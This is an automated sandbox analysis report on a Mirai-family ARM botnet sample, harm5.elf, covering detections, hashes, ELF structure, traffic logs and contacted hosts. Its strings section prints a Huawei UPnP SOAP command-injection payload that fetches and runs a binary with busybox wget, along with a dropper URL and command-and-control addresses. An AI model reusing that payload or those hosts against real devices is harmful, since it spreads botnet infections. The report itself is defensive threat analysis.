Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
harm5.elf

Overview

General Information

Sample name:harm5.elf
Analysis ID:1546611
MD5:32572c3cd5ccdc3ce70819f7bf330204
SHA1:d9e055d7d6c574098bf9c9f75da7666a6d14491a
SHA256:fab327fbb72ab797d94f685feb5f285c3e556d9e49715e174333c8a554d750d0
Tags:elfuser-abuse_ch
Infos:

Detection

Mirai
Score:80
Range:0 - 100
Whitelisted:false

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Yara detected Mirai
Connects to many ports of the same IP (likely port scanning)
Sample reads /proc/mounts (often used for finding a writable filesystem)
Detected TCP or UDP traffic on non-standard ports
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample has stripped symbol table
Sample listens on a socket
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Uses the "uname" system call to query kernel version information (possible evasion)

Classification

Joe Sandbox version:41.0.0 Charoite
Analysis ID:1546611
Start date and time:2024-11-01 08:47:07 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 4m 42s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:harm5.elf
Detection:MAL
Classification:mal80.troj.linELF@0/0@23/0
  • VT rate limit hit for: harm5.elf
Command:/tmp/harm5.elf
PID:6226
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
you are now apart of hail cock botnet
Standard Error:
  • system is lnxubuntu20
  • harm5.elf (PID: 6226, Parent: 6152, MD5: 5ebfcae4fe2471fcc5695c2394773ff1) Arguments: /tmp/harm5.elf
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
MiraiMirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai
SourceRuleDescriptionAuthorStrings
harm5.elfJoeSecurity_Mirai_6Yara detected MiraiJoe Security
    harm5.elfJoeSecurity_Mirai_8Yara detected MiraiJoe Security
      SourceRuleDescriptionAuthorStrings
      6233.1.00007efcdc017000.00007efcdc02d000.r-x.sdmpJoeSecurity_Mirai_6Yara detected MiraiJoe Security
        6233.1.00007efcdc017000.00007efcdc02d000.r-x.sdmpJoeSecurity_Mirai_8Yara detected MiraiJoe Security
          6226.1.00007efcdc017000.00007efcdc02d000.r-x.sdmpJoeSecurity_Mirai_6Yara detected MiraiJoe Security
            6226.1.00007efcdc017000.00007efcdc02d000.r-x.sdmpJoeSecurity_Mirai_8Yara detected MiraiJoe Security
              6228.1.00007efcdc017000.00007efcdc02d000.r-x.sdmpJoeSecurity_Mirai_6Yara detected MiraiJoe Security
                Click to see the 4 entries
                No Suricata rule has matched

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: harm5.elfAvira: detected
                Source: harm5.elfReversingLabs: Detection: 52%

                Networking

                barindex
                Source: global trafficTCP traffic: 213.182.204.57 ports 9334,0,1,3,5,13035
                Source: global trafficTCP traffic: 193.233.193.45 ports 1,5,7,8,1857,17669
                Source: global trafficTCP traffic: 192.168.2.23:43344 -> 31.13.248.89:7347
                Source: global trafficTCP traffic: 192.168.2.23:33782 -> 193.233.193.45:1857
                Source: global trafficTCP traffic: 192.168.2.23:44052 -> 91.149.218.232:24145
                Source: global trafficTCP traffic: 192.168.2.23:44588 -> 213.182.204.57:13035
                Source: global trafficTCP traffic: 192.168.2.23:43400 -> 88.151.195.22:13493
                Source: global trafficTCP traffic: 192.168.2.23:53464 -> 91.149.238.18:20344
                Source: global trafficTCP traffic: 192.168.2.23:36524 -> 81.29.149.178:13433
                Source: global trafficTCP traffic: 192.168.2.23:38882 -> 217.28.130.41:7562
                Source: /tmp/harm5.elf (PID: 6226)Socket: 127.0.0.1:1172Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.23:43928 -> 91.189.91.42:443
                Source: global trafficTCP traffic: 192.168.2.23:42836 -> 91.189.91.43:443
                Source: global trafficTCP traffic: 192.168.2.23:42516 -> 109.202.202.202:80
                Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
                Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
                Source: unknownTCP traffic detected without corresponding DNS query: 109.202.202.202
                Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
                Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
                Source: unknownTCP traffic detected without corresponding DNS query: 109.202.202.202
                Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
                Source: unknownUDP traffic detected without corresponding DNS query: 81.169.136.222
                Source: unknownUDP traffic detected without corresponding DNS query: 81.169.136.222
                Source: unknownUDP traffic detected without corresponding DNS query: 202.61.197.122
                Source: unknownUDP traffic detected without corresponding DNS query: 194.36.144.87
                Source: unknownUDP traffic detected without corresponding DNS query: 81.169.136.222
                Source: unknownUDP traffic detected without corresponding DNS query: 5.161.109.23
                Source: unknownUDP traffic detected without corresponding DNS query: 80.152.203.134
                Source: unknownUDP traffic detected without corresponding DNS query: 139.84.165.176
                Source: unknownUDP traffic detected without corresponding DNS query: 185.181.61.24
                Source: unknownUDP traffic detected without corresponding DNS query: 194.36.144.87
                Source: unknownUDP traffic detected without corresponding DNS query: 137.220.52.23
                Source: unknownUDP traffic detected without corresponding DNS query: 5.161.109.23
                Source: unknownUDP traffic detected without corresponding DNS query: 51.158.108.203
                Source: unknownUDP traffic detected without corresponding DNS query: 217.160.70.42
                Source: unknownUDP traffic detected without corresponding DNS query: 80.152.203.134
                Source: unknownUDP traffic detected without corresponding DNS query: 194.36.144.87
                Source: unknownUDP traffic detected without corresponding DNS query: 152.53.15.127
                Source: unknownUDP traffic detected without corresponding DNS query: 64.176.6.48
                Source: unknownUDP traffic detected without corresponding DNS query: 139.84.165.176
                Source: unknownUDP traffic detected without corresponding DNS query: 152.53.15.127
                Source: unknownUDP traffic detected without corresponding DNS query: 178.254.22.166
                Source: unknownUDP traffic detected without corresponding DNS query: 185.181.61.24
                Source: unknownUDP traffic detected without corresponding DNS query: 51.158.108.203
                Source: unknownUDP traffic detected without corresponding DNS query: 70.34.254.19
                Source: unknownUDP traffic detected without corresponding DNS query: 51.158.108.203
                Source: unknownUDP traffic detected without corresponding DNS query: 70.34.254.19
                Source: global trafficDNS traffic detected: DNS query: kingstonwikkerink.dyn
                Source: harm5.elf, 6233.1.00007efcdc036000.00007efcdc03c000.rw-.sdmpString found in binary or memory: http://hailcocks.ru/wget.sh;
                Source: harm5.elfString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                Source: harm5.elfString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                Source: unknownNetwork traffic detected: HTTP traffic on port 43928 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 42836 -> 443
                Source: Initial sampleString containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g
                Source: Initial sampleString containing 'busybox' found: -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: Initial sampleString containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: ELF static info symbol of initial sample.symtab present: no
                Source: classification engineClassification label: mal80.troj.linELF@0/0@23/0

                Persistence and Installation Behavior

                barindex
                Source: /tmp/harm5.elf (PID: 6228)File: /proc/6228/mountsJump to behavior
                Source: /tmp/harm5.elf (PID: 6226)Queries kernel information via 'uname': Jump to behavior
                Source: harm5.elf, 6233.1.00007fffd2b46000.00007fffd2b67000.rw-.sdmpBinary or memory string: ~qemu: uncaught target signal 11 (Segmentation fault) - core dumped
                Source: harm5.elf, 6226.1.000055fa0d23d000.000055fa0d3b3000.rw-.sdmp, harm5.elf, 6228.1.000055fa0d23d000.000055fa0d3b3000.rw-.sdmp, harm5.elf, 6233.1.000055fa0d23d000.000055fa0d3b3000.rw-.sdmpBinary or memory string: U!/etc/qemu-binfmt/arm
                Source: harm5.elf, 6226.1.000055fa0d23d000.000055fa0d3b3000.rw-.sdmp, harm5.elf, 6228.1.000055fa0d23d000.000055fa0d3b3000.rw-.sdmp, harm5.elf, 6233.1.000055fa0d23d000.000055fa0d3b3000.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/arm
                Source: harm5.elf, 6226.1.00007fffd2b46000.00007fffd2b67000.rw-.sdmp, harm5.elf, 6228.1.00007fffd2b46000.00007fffd2b67000.rw-.sdmp, harm5.elf, 6233.1.00007fffd2b46000.00007fffd2b67000.rw-.sdmpBinary or memory string: /usr/bin/qemu-arm
                Source: harm5.elf, 6226.1.00007fffd2b46000.00007fffd2b67000.rw-.sdmp, harm5.elf, 6228.1.00007fffd2b46000.00007fffd2b67000.rw-.sdmp, harm5.elf, 6233.1.00007fffd2b46000.00007fffd2b67000.rw-.sdmpBinary or memory string: x86_64/usr/bin/qemu-arm/tmp/harm5.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/harm5.elf
                Source: harm5.elf, 6233.1.00007fffd2b46000.00007fffd2b67000.rw-.sdmpBinary or memory string: qemu: uncaught target signal 11 (Segmentation fault) - core dumped

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: harm5.elf, type: SAMPLE
                Source: Yara matchFile source: 6233.1.00007efcdc017000.00007efcdc02d000.r-x.sdmp, type: MEMORY
                Source: Yara matchFile source: 6226.1.00007efcdc017000.00007efcdc02d000.r-x.sdmp, type: MEMORY
                Source: Yara matchFile source: 6228.1.00007efcdc017000.00007efcdc02d000.r-x.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: harm5.elf PID: 6226, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: harm5.elf PID: 6228, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: harm5.elf PID: 6233, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: harm5.elf, type: SAMPLE
                Source: Yara matchFile source: 6233.1.00007efcdc017000.00007efcdc02d000.r-x.sdmp, type: MEMORY
                Source: Yara matchFile source: 6226.1.00007efcdc017000.00007efcdc02d000.r-x.sdmp, type: MEMORY
                Source: Yara matchFile source: 6228.1.00007efcdc017000.00007efcdc02d000.r-x.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: harm5.elf PID: 6226, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: harm5.elf PID: 6228, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: harm5.elf PID: 6233, type: MEMORYSTR
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management InstrumentationPath InterceptionPath InterceptionDirect Volume AccessOS Credential Dumping11
                Security Software Discovery
                Remote ServicesData from Local System1
                Encrypted Channel
                Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS Memory1
                File and Directory Discovery
                Remote Desktop ProtocolData from Removable Media1
                Non-Standard Port
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive1
                Non-Application Layer Protocol
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture2
                Application Layer Protocol
                Traffic DuplicationData Destruction
                No configs have been found
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Number of created Files
                • Is malicious
                • Internet
                SourceDetectionScannerLabelLink
                harm5.elf53%ReversingLabsLinux.Trojan.Mirai
                harm5.elf100%AviraEXP/ELF.Mirai.W
                No Antivirus matches
                No Antivirus matches
                SourceDetectionScannerLabelLink
                http://schemas.xmlsoap.org/soap/encoding/0%URL Reputationsafe
                http://schemas.xmlsoap.org/soap/envelope/0%URL Reputationsafe
                NameIPActiveMaliciousAntivirus DetectionReputation
                kingstonwikkerink.dyn
                217.28.130.41
                truefalse
                  unknown
                  NameSourceMaliciousAntivirus DetectionReputation
                  http://hailcocks.ru/wget.sh;harm5.elf, 6233.1.00007efcdc036000.00007efcdc03c000.rw-.sdmpfalse
                    unknown
                    http://schemas.xmlsoap.org/soap/encoding/harm5.elffalse
                    • URL Reputation: safe
                    unknown
                    http://schemas.xmlsoap.org/soap/envelope/harm5.elffalse
                    • URL Reputation: safe
                    unknown
                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs
                    IPDomainCountryFlagASNASN NameMalicious
                    217.28.130.41
                    kingstonwikkerink.dynUnited Kingdom
                    15839COBWEB-NETGBfalse
                    213.182.204.57
                    unknownLatvia
                    9009M247GBtrue
                    193.233.193.45
                    unknownRussian Federation
                    2895FREE-NET-ASFREEnetEUtrue
                    31.13.248.89
                    unknownBulgaria
                    34224NETERRA-ASBGfalse
                    88.151.195.22
                    unknownAzerbaijan
                    15723AZERONLINEAZfalse
                    91.149.238.18
                    unknownPoland
                    41952MARTON-ASPLfalse
                    81.29.149.178
                    unknownSwitzerland
                    39616COMUNICA_IT_SERVICESCHfalse
                    91.189.91.43
                    unknownUnited Kingdom
                    41231CANONICAL-ASGBfalse
                    91.189.91.42
                    unknownUnited Kingdom
                    41231CANONICAL-ASGBfalse
                    109.202.202.202
                    unknownSwitzerland
                    13030INIT7CHfalse
                    91.149.218.232
                    unknownPoland
                    198401GECKONET-ASPLfalse
                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    217.28.130.41harm5.elfGet hashmaliciousUnknownBrowse
                      mips.elfGet hashmaliciousUnknownBrowse
                        arm5.elfGet hashmaliciousUnknownBrowse
                          213.182.204.57harm5.elfGet hashmaliciousUnknownBrowse
                            harm4.elfGet hashmaliciousUnknownBrowse
                              mips.elfGet hashmaliciousUnknownBrowse
                                arm4.elfGet hashmaliciousUnknownBrowse
                                  x86.elfGet hashmaliciousUnknownBrowse
                                    arm5.elfGet hashmaliciousUnknownBrowse
                                      nshmpsl.elfGet hashmaliciousUnknownBrowse
                                        nsharm.elfGet hashmaliciousUnknownBrowse
                                          nsharm5.elfGet hashmaliciousUnknownBrowse
                                            harm5.elfGet hashmaliciousUnknownBrowse
                                              193.233.193.45harm5.elfGet hashmaliciousUnknownBrowse
                                                harm4.elfGet hashmaliciousUnknownBrowse
                                                  mips.elfGet hashmaliciousUnknownBrowse
                                                    arm4.elfGet hashmaliciousUnknownBrowse
                                                      x86.elfGet hashmaliciousMiraiBrowse
                                                        x86.elfGet hashmaliciousUnknownBrowse
                                                          arm5.elfGet hashmaliciousUnknownBrowse
                                                            nsharm7.elfGet hashmaliciousUnknownBrowse
                                                              nshmpsl.elfGet hashmaliciousUnknownBrowse
                                                                nsharm.elfGet hashmaliciousUnknownBrowse
                                                                  31.13.248.89harm5.elfGet hashmaliciousUnknownBrowse
                                                                    harm4.elfGet hashmaliciousUnknownBrowse
                                                                      mips.elfGet hashmaliciousUnknownBrowse
                                                                        arm4.elfGet hashmaliciousUnknownBrowse
                                                                          arm5.elfGet hashmaliciousUnknownBrowse
                                                                            x86.elfGet hashmaliciousMiraiBrowse
                                                                              x86.elfGet hashmaliciousUnknownBrowse
                                                                                arm5.elfGet hashmaliciousUnknownBrowse
                                                                                  nsharm.elfGet hashmaliciousUnknownBrowse
                                                                                    gmpsl.elfGet hashmaliciousUnknownBrowse
                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                      kingstonwikkerink.dynharm5.elfGet hashmaliciousUnknownBrowse
                                                                                      • 217.28.130.41
                                                                                      harm4.elfGet hashmaliciousUnknownBrowse
                                                                                      • 31.13.248.89
                                                                                      mips.elfGet hashmaliciousUnknownBrowse
                                                                                      • 91.149.218.232
                                                                                      arm4.elfGet hashmaliciousUnknownBrowse
                                                                                      • 91.149.218.232
                                                                                      arm5.elfGet hashmaliciousUnknownBrowse
                                                                                      • 213.182.204.57
                                                                                      x86.elfGet hashmaliciousMiraiBrowse
                                                                                      • 88.151.195.22
                                                                                      x86.elfGet hashmaliciousUnknownBrowse
                                                                                      • 195.133.92.51
                                                                                      arm5.elfGet hashmaliciousUnknownBrowse
                                                                                      • 185.82.200.181
                                                                                      nsharm7.elfGet hashmaliciousUnknownBrowse
                                                                                      • 81.29.149.178
                                                                                      nshmpsl.elfGet hashmaliciousUnknownBrowse
                                                                                      • 193.233.193.45
                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                      M247GBg5tO58gHku.exeGet hashmaliciousAsyncRATBrowse
                                                                                      • 45.74.34.32
                                                                                      harm5.elfGet hashmaliciousUnknownBrowse
                                                                                      • 213.182.204.57
                                                                                      harm4.elfGet hashmaliciousUnknownBrowse
                                                                                      • 213.182.204.57
                                                                                      mips.elfGet hashmaliciousUnknownBrowse
                                                                                      • 213.182.204.57
                                                                                      arm4.elfGet hashmaliciousUnknownBrowse
                                                                                      • 213.182.204.57
                                                                                      bxUX6ztvg2.exeGet hashmaliciousAsyncRAT, DcRatBrowse
                                                                                      • 45.74.34.32
                                                                                      nOrden_de_Compra___0001245.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                      • 185.236.203.101
                                                                                      wZU2edEGL3.elfGet hashmaliciousUnknownBrowse
                                                                                      • 38.203.241.135
                                                                                      8v2IShmMos.elfGet hashmaliciousUnknownBrowse
                                                                                      • 154.17.76.69
                                                                                      la.bot.sparc.elfGet hashmaliciousUnknownBrowse
                                                                                      • 38.202.225.97
                                                                                      COBWEB-NETGBharm5.elfGet hashmaliciousUnknownBrowse
                                                                                      • 217.28.130.41
                                                                                      mips.elfGet hashmaliciousUnknownBrowse
                                                                                      • 217.28.130.41
                                                                                      arm5.elfGet hashmaliciousUnknownBrowse
                                                                                      • 217.28.130.41
                                                                                      UiodpDMy4N.elfGet hashmaliciousUnknownBrowse
                                                                                      • 217.28.142.8
                                                                                      miori.armGet hashmaliciousMiraiBrowse
                                                                                      • 217.28.142.91
                                                                                      Iw6uyVeTY4Get hashmaliciousMiraiBrowse
                                                                                      • 217.28.142.95
                                                                                      x86Get hashmaliciousMiraiBrowse
                                                                                      • 217.28.142.99
                                                                                      kEZpozRREFGet hashmaliciousMiraiBrowse
                                                                                      • 217.28.142.97
                                                                                      FREE-NET-ASFREEnetEUharm5.elfGet hashmaliciousUnknownBrowse
                                                                                      • 193.233.193.45
                                                                                      harm4.elfGet hashmaliciousUnknownBrowse
                                                                                      • 193.233.193.45
                                                                                      mips.elfGet hashmaliciousUnknownBrowse
                                                                                      • 193.233.193.45
                                                                                      arm4.elfGet hashmaliciousUnknownBrowse
                                                                                      • 193.233.193.45
                                                                                      Set-up.exeGet hashmaliciousLummaC StealerBrowse
                                                                                      • 147.45.47.81
                                                                                      la.bot.powerpc.elfGet hashmaliciousUnknownBrowse
                                                                                      • 193.233.45.230
                                                                                      2QPrBtk3J8.exeGet hashmaliciousUnknownBrowse
                                                                                      • 147.45.48.137
                                                                                      v9dVG4fAGa.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                                                      • 147.45.48.137
                                                                                      LkCinYWgNh.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                                                      • 147.45.48.137
                                                                                      v9dVG4fAGa.exeGet hashmaliciousClipboard HijackerBrowse
                                                                                      • 147.45.48.137
                                                                                      No context
                                                                                      No context
                                                                                      No created / dropped files found
                                                                                      File type:ELF 32-bit LSB executable, ARM, version 1 (ARM), statically linked, stripped
                                                                                      Entropy (8bit):6.128035465404075
                                                                                      TrID:
                                                                                      • ELF Executable and Linkable format (generic) (4004/1) 100.00%
                                                                                      File name:harm5.elf
                                                                                      File size:91'640 bytes
                                                                                      MD5:32572c3cd5ccdc3ce70819f7bf330204
                                                                                      SHA1:d9e055d7d6c574098bf9c9f75da7666a6d14491a
                                                                                      SHA256:fab327fbb72ab797d94f685feb5f285c3e556d9e49715e174333c8a554d750d0
                                                                                      SHA512:bc81a926ab197750ea14893c2183ea495ab6726bff6932373c98c393aad1ccf546ed42111edce3c4ae030c09a3692cacd137e9be616deccb2389940fbe040a38
                                                                                      SSDEEP:1536:xr6wS2m6bCwkK5tXVJbALam6N65Gtl0Rck86NR5Ps0hLlwP2HGM:t6wSP6bLXAxy65GMF86N9hSrM
                                                                                      TLSH:D3934B95BC819A12C6D121B7FB6E428D372653A8D3EF3203DD256F24778B86B0E77601
                                                                                      File Content Preview:.ELF...a..........(.........4...@d......4. ...(......................\...\...............`...`...`.......U..........Q.td..................................-...L."...(O..........0@-.\P...0....S.0...P@...0... ....R......0...0...........0... ....R..... 0....S

                                                                                      ELF header

                                                                                      Class:ELF32
                                                                                      Data:2's complement, little endian
                                                                                      Version:1 (current)
                                                                                      Machine:ARM
                                                                                      Version Number:0x1
                                                                                      Type:EXEC (Executable file)
                                                                                      OS/ABI:ARM - ABI
                                                                                      ABI Version:0
                                                                                      Entry Point Address:0x8190
                                                                                      Flags:0x2
                                                                                      ELF Header Size:52
                                                                                      Program Header Offset:52
                                                                                      Program Header Size:32
                                                                                      Number of Program Headers:3
                                                                                      Section Header Offset:91200
                                                                                      Section Header Size:40
                                                                                      Number of Section Headers:11
                                                                                      Header String Table Index:10
                                                                                      NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                                                                                      NULL0x00x00x00x00x0000
                                                                                      .initPROGBITS0x80940x940x180x00x6AX004
                                                                                      .textPROGBITS0x80b00xb00x13cd80x00x6AX0016
                                                                                      .finiPROGBITS0x1bd880x13d880x140x00x6AX004
                                                                                      .rodataPROGBITS0x1bd9c0x13d9c0x1f200x00x2A004
                                                                                      .eh_framePROGBITS0x1dcbc0x15cbc0x40x00x2A004
                                                                                      .ctorsPROGBITS0x260000x160000x80x00x3WA004
                                                                                      .dtorsPROGBITS0x260080x160080x80x00x3WA004
                                                                                      .dataPROGBITS0x260140x160140x3e40x00x3WA004
                                                                                      .bssNOBITS0x263f80x163f80x51ac0x00x3WA004
                                                                                      .shstrtabSTRTAB0x00x163f80x480x00x0001
                                                                                      TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                                                                                      LOAD0x00x80000x80000x15cc00x15cc06.18370x5R E0x8000.init .text .fini .rodata .eh_frame
                                                                                      LOAD0x160000x260000x260000x3f80x55a43.41290x6RW 0x8000.ctors .dtors .data .bss
                                                                                      GNU_STACK0x00x00x00x00x00.00000x7RWE0x4
                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                      Nov 1, 2024 08:47:55.647263050 CET433447347192.168.2.2331.13.248.89
                                                                                      Nov 1, 2024 08:47:55.652147055 CET73474334431.13.248.89192.168.2.23
                                                                                      Nov 1, 2024 08:47:55.652200937 CET433447347192.168.2.2331.13.248.89
                                                                                      Nov 1, 2024 08:47:55.663791895 CET433447347192.168.2.2331.13.248.89
                                                                                      Nov 1, 2024 08:47:55.668653011 CET73474334431.13.248.89192.168.2.23
                                                                                      Nov 1, 2024 08:47:55.668692112 CET433447347192.168.2.2331.13.248.89
                                                                                      Nov 1, 2024 08:47:55.674212933 CET73474334431.13.248.89192.168.2.23
                                                                                      Nov 1, 2024 08:47:55.702282906 CET43928443192.168.2.2391.189.91.42
                                                                                      Nov 1, 2024 08:47:56.752536058 CET73474334431.13.248.89192.168.2.23
                                                                                      Nov 1, 2024 08:47:56.752546072 CET73474334431.13.248.89192.168.2.23
                                                                                      Nov 1, 2024 08:47:56.752549887 CET73474334431.13.248.89192.168.2.23
                                                                                      Nov 1, 2024 08:47:56.752600908 CET433447347192.168.2.2331.13.248.89
                                                                                      Nov 1, 2024 08:47:56.752600908 CET433447347192.168.2.2331.13.248.89
                                                                                      Nov 1, 2024 08:47:56.752628088 CET433447347192.168.2.2331.13.248.89
                                                                                      Nov 1, 2024 08:47:56.752909899 CET433447347192.168.2.2331.13.248.89
                                                                                      Nov 1, 2024 08:48:01.333522081 CET42836443192.168.2.2391.189.91.43
                                                                                      Nov 1, 2024 08:48:01.785027027 CET337821857192.168.2.23193.233.193.45
                                                                                      Nov 1, 2024 08:48:01.791347027 CET185733782193.233.193.45192.168.2.23
                                                                                      Nov 1, 2024 08:48:01.791429996 CET337821857192.168.2.23193.233.193.45
                                                                                      Nov 1, 2024 08:48:01.791469097 CET337821857192.168.2.23193.233.193.45
                                                                                      Nov 1, 2024 08:48:01.796926975 CET185733782193.233.193.45192.168.2.23
                                                                                      Nov 1, 2024 08:48:01.796987057 CET337821857192.168.2.23193.233.193.45
                                                                                      Nov 1, 2024 08:48:01.801898956 CET185733782193.233.193.45192.168.2.23
                                                                                      Nov 1, 2024 08:48:01.845446110 CET4251680192.168.2.23109.202.202.202
                                                                                      Nov 1, 2024 08:48:03.111116886 CET185733782193.233.193.45192.168.2.23
                                                                                      Nov 1, 2024 08:48:03.111130953 CET185733782193.233.193.45192.168.2.23
                                                                                      Nov 1, 2024 08:48:03.111136913 CET185733782193.233.193.45192.168.2.23
                                                                                      Nov 1, 2024 08:48:03.111260891 CET337821857192.168.2.23193.233.193.45
                                                                                      Nov 1, 2024 08:48:03.111260891 CET337821857192.168.2.23193.233.193.45
                                                                                      Nov 1, 2024 08:48:03.111260891 CET337821857192.168.2.23193.233.193.45
                                                                                      Nov 1, 2024 08:48:03.111306906 CET337821857192.168.2.23193.233.193.45
                                                                                      Nov 1, 2024 08:48:17.203353882 CET43928443192.168.2.2391.189.91.42
                                                                                      Nov 1, 2024 08:48:23.166599989 CET4405224145192.168.2.2391.149.218.232
                                                                                      Nov 1, 2024 08:48:23.173216105 CET241454405291.149.218.232192.168.2.23
                                                                                      Nov 1, 2024 08:48:23.173296928 CET4405224145192.168.2.2391.149.218.232
                                                                                      Nov 1, 2024 08:48:23.173353910 CET4405224145192.168.2.2391.149.218.232
                                                                                      Nov 1, 2024 08:48:23.178256035 CET241454405291.149.218.232192.168.2.23
                                                                                      Nov 1, 2024 08:48:23.178329945 CET4405224145192.168.2.2391.149.218.232
                                                                                      Nov 1, 2024 08:48:23.183209896 CET241454405291.149.218.232192.168.2.23
                                                                                      Nov 1, 2024 08:48:24.126970053 CET241454405291.149.218.232192.168.2.23
                                                                                      Nov 1, 2024 08:48:24.126991034 CET241454405291.149.218.232192.168.2.23
                                                                                      Nov 1, 2024 08:48:24.127118111 CET4405224145192.168.2.2391.149.218.232
                                                                                      Nov 1, 2024 08:48:24.127173901 CET4405224145192.168.2.2391.149.218.232
                                                                                      Nov 1, 2024 08:48:24.127173901 CET4405224145192.168.2.2391.149.218.232
                                                                                      Nov 1, 2024 08:48:24.127230883 CET241454405291.149.218.232192.168.2.23
                                                                                      Nov 1, 2024 08:48:24.127280951 CET4405224145192.168.2.2391.149.218.232
                                                                                      Nov 1, 2024 08:48:24.127532005 CET241454405291.149.218.232192.168.2.23
                                                                                      Nov 1, 2024 08:48:24.127567053 CET4405224145192.168.2.2391.149.218.232
                                                                                      Nov 1, 2024 08:48:27.442039013 CET42836443192.168.2.2391.189.91.43
                                                                                      Nov 1, 2024 08:48:29.140384912 CET4458813035192.168.2.23213.182.204.57
                                                                                      Nov 1, 2024 08:48:29.145329952 CET1303544588213.182.204.57192.168.2.23
                                                                                      Nov 1, 2024 08:48:29.145421028 CET4458813035192.168.2.23213.182.204.57
                                                                                      Nov 1, 2024 08:48:29.145462036 CET4458813035192.168.2.23213.182.204.57
                                                                                      Nov 1, 2024 08:48:29.150480986 CET1303544588213.182.204.57192.168.2.23
                                                                                      Nov 1, 2024 08:48:29.150551081 CET4458813035192.168.2.23213.182.204.57
                                                                                      Nov 1, 2024 08:48:29.155386925 CET1303544588213.182.204.57192.168.2.23
